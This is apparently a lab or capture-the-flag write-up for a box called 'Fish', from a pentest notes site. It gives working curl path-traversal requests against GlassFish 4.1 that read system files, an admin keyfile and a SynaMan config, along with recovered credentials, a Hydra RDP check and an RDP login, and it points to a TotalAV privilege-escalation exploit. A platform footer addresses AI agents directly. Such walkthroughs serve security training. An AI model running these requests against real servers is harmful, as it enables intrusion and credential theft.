> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/to-do/fish.md).

# Fish

## Nmap

```
nmap 192.168.213.168 -sS -sV -p- -Pn

PORT     STATE SERVICE              VERSION
3389/tcp open  ms-wbt-server?
3700/tcp open  giop                 CORBA naming service
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
6060/tcp open  x11?
7676/tcp open  java-message-service Java Message Service 301
7680/tcp open  pando-pub?
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
8686/tcp open  sun-as-jmxrmi?
```

Starting out we begin using `searchsploit` to discover know vulnerabilities against the services.

```bash
searchsploit -w "GlassFish 4.1"
```

![](/files/eh9y8d5nHQwucBiDoNY3)

Looks like the of GlassFish running is vulnerable to Directory Traversal. The following exploit examples can be used to read known system files.

**ExploitDB:** <https://www.exploit-db.com/exploits/39441>

Using one of the examples in the link with the correct IP and port we are able to build a `curl` GET request to confirm the directory traversal.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 
```

![](/files/kjU9j6ab2X4bRVOlRjFO)

After this I looked up configuration files for GlassFish to see if we can read any sensitive credential files. This StackOverflow [link](https://stackoverflow.com/questions/41078683/how-do-i-reset-the-forgotten-password-of-glassfish-server-4) proved to be informative and I was able to read the admin hash for GlassFish with a little bit of guesswork.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../glassfish4/glassfish/domains/domain1/config/admin-keyfileadmin
```

![](/files/WN3u9KWcbdRLxE3YtWge)

Unfortunately however, I was unable to crack the hash and proceed with anything meaningful for now.

Looking through the rest of the open ports manually we come across the page "SynaMan" which we observe is running version 4.0.

![](/files/GEdDg27aLcV7KMhvLFPN)

Again, with `searchsploit` we are able to see if the version running is vulnerable.

```bash
searchsploit -w "SynaMan 4.0"
```

![](/files/QAbAJMsokMnUWWsMfpwW)

The `SMTP` disclosure is interesting to us:

**ExploitDB:** <https://www.exploit-db.com/exploits/45387>

![](/files/uInHKADNRT8hucFFi34C)

We see from the description that as we already have a directory traversal exploit on the system we can likely read the desired AppConfig.xml

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml   
```

![](/files/0Z7Q09A34fY8sMTvG7HW)

From the output we are able to tie together the following credentials:

```
arthur:KingOfAtlantis
```

Being as `RDP` is open a quick check with `Hydra` confirms the credentials are valid.

```bash
hydra -l "arthur" -p "KingOfAtlantis" rdp://<IP> 
```

![](/files/cGra9NtjLQARVYNNwBbR)

We can then connect via `RDP` to the target system.

```bash
xfreerdp /u:"arthur" /p:"KingOfAtlantis" +clipboard /v:<IP>
```

![](/files/RHOgcSC7R1QJb0Yew97n)

We see on the desktop a shortcut for the AV application `TotalAV`. Checking `appwiz.cpl` we see that the installed version is *4.14.31*.

![](/files/9Pbvv3OfZ3brxe75A8q4)

`searchsploit` again shows a vulnerability with the installed version.

```bash
searchsploit -w "TotalAV 4.14.31"
```

![](/files/GAEJQ27JeSXv7gowoG03)

This version of `TotalAV` appears to be vulnerable to Privilege Escalation.

**ExploitDB:** <https://www.exploit-db.com/exploits/47897>

**Youtube:** <https://www.youtube.com/watch?v=88qeaLq98Gc>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/to-do/fish.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.